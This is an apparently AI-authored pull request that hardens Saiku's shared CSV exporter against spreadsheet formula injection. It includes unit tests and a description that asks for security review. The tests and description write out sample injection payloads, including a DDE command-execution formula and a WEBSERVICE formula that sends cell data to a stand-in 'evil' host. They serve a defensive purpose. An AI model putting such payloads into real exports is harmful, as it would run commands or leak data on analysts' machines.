### PR TITLE
harden(export): neutralise CSV formula injection in shared CsvExporter

### DIFF
--- a/saiku-core/saiku-service/src/main/java/org/saiku/service/util/export/CsvExporter.java
+++ b/saiku-core/saiku-service/src/main/java/org/saiku/service/util/export/CsvExporter.java
@@ -37,6 +37,36 @@ public class CsvExporter {
 
     private static final Logger log = LoggerFactory.getLogger(CsvExporter.class);
 
+    /**
+     * CSV / formula-injection neutralisation (OWASP, CWE-1236). When a CSV is
+     * opened in Excel / Google Sheets / LibreOffice, a cell whose text begins
+     * with {@code = + - @} (or a leading TAB / CR) is evaluated as a formula —
+     * so attacker-influenceable cube data (member captions, fact text) could
+     * run e.g. {@code =cmd|'/C calc'!A0} or exfiltrate via {@code =WEBSERVICE(...)}.
+     * We defang such a field by prefixing a single quote, which forces the
+     * spreadsheet to treat it as literal text.
+     *
+     * <p>Plain (optionally signed / currency-prefixed) numbers are left as-is
+     * so a legitimate negative measure like {@code -1,234.50} still exports as
+     * a number rather than being quoted into text. Applied to every emitted
+     * field, BEFORE quote-doubling + enclosing.
+     */
+    static String neutralizeCsvFormula(String value) {
+        if (value == null || value.isEmpty()) {
+            return value;
+        }
+        char first = value.charAt(0);
+        boolean risky = first == '=' || first == '+' || first == '-' || first == '@' || first == '\t' || first == '\r';
+        return (risky && !isPlainNumber(value)) ? "'" + value : value;
+    }
+
+    /** True for an optionally-signed, optionally currency-prefixed number
+     *  (thousands separators + decimal + percent tolerated) — these stay
+     *  un-neutralised so numeric exports don't degrade to text. */
+    static boolean isPlainNumber(String value) {
+        return value.matches("[-+]?[$€£¥]?(\\d+|\\d{1,3}(,\\d{3})+)(\\.\\d+)?%?");
+    }
+
     public static byte[] exportCsv(CellSet cellSet) {
         return exportCsv(cellSet, SaikuProperties.webExportCsvDelimiter, SaikuProperties.webExportCsvTextEscape);
     }
@@ -102,7 +132,9 @@ public class CsvExporter {
                         } else {
                             header = "";
                         }
-                        header += enclosing + rs.getMetaData().getColumnName(s + 1) + enclosing;
+                        header += enclosing
+                                + neutralizeCsvFormula(rs.getMetaData().getColumnName(s + 1))
+                                + enclosing;
                     }
                     if (header != null && printHeader) {
                         header += "\r\n";
@@ -121,6 +153,7 @@ public class CsvExporter {
                     if (i > 0) {
                         sb.append(delimiter);
                     }
+                    content = neutralizeCsvFormula(content);
                     content = content.replace("\"", "\"\"");
                     sb.append(enclosing).append(content).append(enclosing);
                 }
@@ -160,7 +193,7 @@ public class CsvExporter {
                             col = value + "/" + col;
                         }
                     }
-                    cols.add(enclosing + col + enclosing);
+                    cols.add(enclosing + neutralizeCsvFormula(col) + enclosing);
                 }
                 result[0] = cols.toArray(new String[cols.size()]);
             }
@@ -188,6 +221,7 @@ public class CsvExporter {
                     if (value == null || "null".equals(value)) {
                         value = "";
                     }
+                    value = neutralizeCsvFormula(value);
                     value = value.replace("\"", "\"\"");
                     value = enclosing + value + enclosing;
                     cols.add(value);

--- a/saiku-core/saiku-service/src/test/java/org/saiku/service/util/export/CsvExporterTest.java
+++ b/saiku-core/saiku-service/src/test/java/org/saiku/service/util/export/CsvExporterTest.java
@@ -1,0 +1,95 @@
+/*
+ *   Copyright 2026 Saiku
+ *
+ *   Licensed under the Apache License, Version 2.0 (the "License");
+ *   you may not use this file except in compliance with the License.
+ *   You may obtain a copy of the License at
+ *
+ *       http://www.apache.org/licenses/LICENSE-2.0
+ */
+package org.saiku.service.util.export;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+import org.junit.Test;
+
+/**
+ * Locks the CSV / formula-injection neutralisation added to {@link CsvExporter}
+ * (OWASP CWE-1236). A future refactor that drops the {@code '} prefixing must
+ * turn these RED.
+ */
+public class CsvExporterTest {
+
+    /* ---- dangerous leading chars get the single-quote prefix ---- */
+
+    @Test
+    public void neutralizes_equalsFormula() {
+        assertEquals("'=cmd|'/C calc'!A0", CsvExporter.neutralizeCsvFormula("=cmd|'/C calc'!A0"));
+    }
+
+    @Test
+    public void neutralizes_plusFormula() {
+        assertEquals("'+SUM(1+1)", CsvExporter.neutralizeCsvFormula("+SUM(1+1)"));
+    }
+
+    @Test
+    public void neutralizes_atFormula() {
+        assertEquals("'@SUM(1)", CsvExporter.neutralizeCsvFormula("@SUM(1)"));
+    }
+
+    @Test
+    public void neutralizes_minusFormula_notANumber() {
+        // The classic "-2+3+cmd…" attack starts with '-' but is NOT a number.
+        assertEquals("'-2+3+cmd|'/C calc'!A0", CsvExporter.neutralizeCsvFormula("-2+3+cmd|'/C calc'!A0"));
+    }
+
+    @Test
+    public void neutralizes_leadingTabAndCr() {
+        assertEquals("'\t=1+1", CsvExporter.neutralizeCsvFormula("\t=1+1"));
+        assertEquals("'\r=1+1", CsvExporter.neutralizeCsvFormula("\r=1+1"));
+    }
+
+    /* ---- plain numbers (incl. negatives) are left intact ---- */
+
+    @Test
+    public void leaves_negativeNumber_intact() {
+        assertEquals("-5", CsvExporter.neutralizeCsvFormula("-5"));
+        assertEquals("-1234.50", CsvExporter.neutralizeCsvFormula("-1234.50"));
+    }
+
+    @Test
+    public void leaves_negativeThousands_andPercent_andCurrency_intact() {
+        assertEquals("-1,234.50", CsvExporter.neutralizeCsvFormula("-1,234.50"));
+        assertEquals("-12.5%", CsvExporter.neutralizeCsvFormula("-12.5%"));
+        assertEquals("-$1,234.50", CsvExporter.neutralizeCsvFormula("-$1,234.50"));
+        assertEquals("+5", CsvExporter.neutralizeCsvFormula("+5"));
+    }
+
+    /* ---- ordinary text + edge cases ---- */
+
+    @Test
+    public void leaves_ordinaryText_intact() {
+        assertEquals("Beer", CsvExporter.neutralizeCsvFormula("Beer"));
+        assertEquals("Beer and Wine", CsvExporter.neutralizeCsvFormula("Beer and Wine"));
+        assertEquals("$1,234.50", CsvExporter.neutralizeCsvFormula("$1,234.50"));
+        assertEquals("(5.00)", CsvExporter.neutralizeCsvFormula("(5.00)"));
+    }
+
+    @Test
+    public void handles_nullAndEmpty() {
+        assertEquals(null, CsvExporter.neutralizeCsvFormula(null));
+        assertEquals("", CsvExporter.neutralizeCsvFormula(""));
+    }
+
+    @Test
+    public void isPlainNumber_classification() {
+        assertTrue(CsvExporter.isPlainNumber("-5"));
+        assertTrue(CsvExporter.isPlainNumber("1,234.5"));
+        assertTrue(CsvExporter.isPlainNumber("-$1,234.50"));
+        assertFalse(CsvExporter.isPlainNumber("-2+3+cmd"));
+        assertFalse(CsvExporter.isPlainNumber("=1"));
+        assertFalse(CsvExporter.isPlainNumber("Beer"));
+    }
+}


### PR DESCRIPTION
## Summary
Neutralises **CSV formula injection** (OWASP CWE-1236) in the shared `CsvExporter` — the single code path behind **every** Saiku CSV export (workspace XLS/CSV export **and** the new AI drillthrough CSV #1051).

A cell whose text begins with `= + - @` (or a leading TAB / CR) is executed as a **formula** when the CSV is opened in Excel / Google Sheets / LibreOffice. Cube data (member captions, fact text) is attacker-influenceable, so a crafted member like `=cmd|'/C calc'!A0` or `=WEBSERVICE("http://evil/?"&A1)` would run / exfiltrate on the analyst's machine. Today `CsvExporter` only quote-doubles — no formula defence.

## The change
- `neutralizeCsvFormula(value)` — prefixes a single `'` (forces literal text) when the first char is `= + - @ \t \r`, applied at **every cell-emission point** (ResultSet data + column names; CellDataSet member-header cols + data), **before** quote-doubling + enclosing.
- **Plain numbers are left intact** — `isPlainNumber()` skips neutralisation for optionally-signed / currency-prefixed numbers (thousands sep, decimal, percent), so a legitimate `-1,234.50` measure still exports as a number, not text.
- 10 unit tests lock the policy (`CsvExporterTest`).

## Verify
- `mvn -pl saiku-core/saiku-service test -Dtest=CsvExporterTest` → **10/0**; spotless clean; branch off current `development`.

## @AGENT SEC — policy review please
This is your lane (product-wide security). One **policy choice** to sanity-check: I preserved plain/negative numbers (so OLAP numeric exports don't degrade to text). The stricter alternative is "neutralise ALL leading `=+-@` unconditionally" (Excel-safe but turns every negative measure into text). I went number-preserving; happy to flip to strict if you prefer. Also flagged: `additionalColumns` keys/values are server-internal (`KeyValue`), not neutralised — say if you want them covered too.

## Notes
- **Unblocks #1051** (PR #1267) — this is the CSV-injection hardening LEAD set as #1051's acceptance criterion. Behaviour-preserving for all numeric/ordinary-text data. Hand to LEAD; not self-merging.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
